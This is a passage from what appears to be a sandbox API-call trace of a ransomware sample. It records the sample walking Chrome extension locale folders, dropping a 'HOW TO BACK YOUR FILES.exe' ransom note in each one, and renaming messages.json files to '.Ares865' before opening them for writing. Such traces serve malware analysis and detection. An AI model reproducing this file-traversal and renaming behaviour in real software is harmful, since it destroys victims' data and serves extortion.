lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.712] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.713] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=260) returned 1 [0103.716] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv" [0103.716] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv" [0103.716] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.716] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.717] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.717] GetLastError () returned 0x0 [0103.717] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.717] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f0e8500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f0e8500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.717] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.717] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.717] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.Ares865") returned 160 [0103.717] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.719] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.719] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=226) returned 1 [0103.722] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr" [0103.722] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr" [0103.722] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.722] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.723] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.723] GetLastError () returned 0x0 [0103.724] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.724] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f10e660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f10e660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.724] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.724] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.724] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.Ares865") returned 160 [0103.724] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.725] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.726] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=260) returned 1 [0103.729] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl" [0103.729] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl" [0103.729] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.729] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.730] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.730] GetLastError () returned 0x0 [0103.730] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.730] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f10e660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f10e660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.730] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.730] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.731] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.Ares865") returned 160 [0103.731] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.732] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.732] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=223) returned 1 [0103.737] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk" [0103.737] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk" [0103.737] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.737] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.737] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.738] GetLastError () returned 0x0 [0103.738] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.738] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f10e660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f10e660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.738] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.738] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.738] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.Ares865") returned 160 [0103.738] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.740] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.740] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=227) returned 1 [0103.743] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru" [0103.743] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru" [0103.743] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.744] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.744] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.744] GetLastError () returned 0x0 [0103.745] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.745] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f10e660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f10e660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.745] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.745] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.745] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.Ares865") returned 160 [0103.745] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.746] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 